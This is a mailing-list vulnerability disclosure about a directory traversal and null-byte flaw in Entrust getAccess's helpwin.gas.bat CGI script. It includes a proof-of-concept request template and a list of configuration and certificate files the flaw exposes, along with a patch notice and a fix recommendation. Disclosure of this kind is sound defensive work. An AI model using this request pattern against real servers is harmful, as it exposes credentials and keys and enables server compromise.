Good Morning Listmembers, this is another posting(see 1st here http://www.securityfocus.com/bid/3109) about Entrust s "getAccess[tm]" product Problem Description: "getAccess[tm]" (still) uses default shellscripts which start java-classes for their web-applications. due to missing input-validation it is possible to read files with getAccess s permissions on the "getaccess"-machine. (only works in combination with other input fields as described below) in connection with config- and other files this can lead to a total server-compromise(dont ask me how:-). POC-Example: a HTTP-request to: http://getAccessHostname/sek-bin/helpwin.gas.bat? with the following parameters: mode= &draw=x &file=x &module= &locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c] &chapter= ... will lead to disclosure of [FILE/PATH] Config-Filelist(depends heavily on config .. and can be found 2 trav s back [../../]): /config/acl-runtime.conf /config/administration.conf /config/applist.conf /config/authmethod.conf /config/clientCert.conf /config/connection.conf /config/directories.conf /config/domainAuth.conf /config/hook.conf /config/license.conf /config/log.conf /config/login.conf /config/misc.conf /config/pmda.conf /config/redirection.conf /config/registry.conf /config/serverCert.conf /config/serverConnection.conf /config/source_systems.conf /config/version.conf /config/serverReq.pem /config/serverCert.pem /config/certs Summary: object: (helpwin.gas.bat cgi-shell-scripts) class: Reffering to OWASP-IV (Input Validation Classes) Directory Traversal (IV-DT-1) http://www.owasp.org/projects/cov/owasp-iv-dt-1.htm Null Character (IV-NC-1) http://www.owasp.org/projects/cov/owasp-iv-nc-1.htm Meta Character (IV-MC-1) http://www.owasp.org/projects/cov/owasp-iv-mc-1.htm remote: yes local: --- vendor: hast been informed with seperate e-mail (security@entrust.com/entrust@entrust.com) patch/fix: is already availiable and will be posted by entrust here today. recomannded fix: sanitize meta-characters from user-input personal remark: using shell-scripts for security-related software has always been dangerous!!! nice day, rC security@freefly.com rudicarell@hotmail.com http://www.freefly.com/security/ check out the brandnew Open Web Application Security project http://www.owasp.org _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
